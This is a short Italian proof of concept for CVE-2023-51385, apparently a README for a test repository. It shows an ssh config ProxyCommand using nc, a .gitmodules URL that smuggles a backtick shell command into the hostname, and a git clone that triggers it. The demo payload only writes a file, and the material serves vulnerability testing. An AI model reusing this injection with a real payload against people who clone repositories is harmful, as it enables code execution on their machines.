
Una verifica per CVE-2023-51385
Prima di tutto, aggiungi il seguente contenuto in ~/.ssh/config
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Nell'istruzione del file .gitmodules è presente un'iniezione di comandi
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
Dopo la configurazione, esegui il seguente comando per attivare la vulnerabilità
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules
Se l'esecuzione va a buon fine, verrà generato il file cve.txt nella directory CVE-2023-51385_test

Nota: è richiesta OpenSSH <9.6p1
Per maggiori dettagli, consulta questo blog: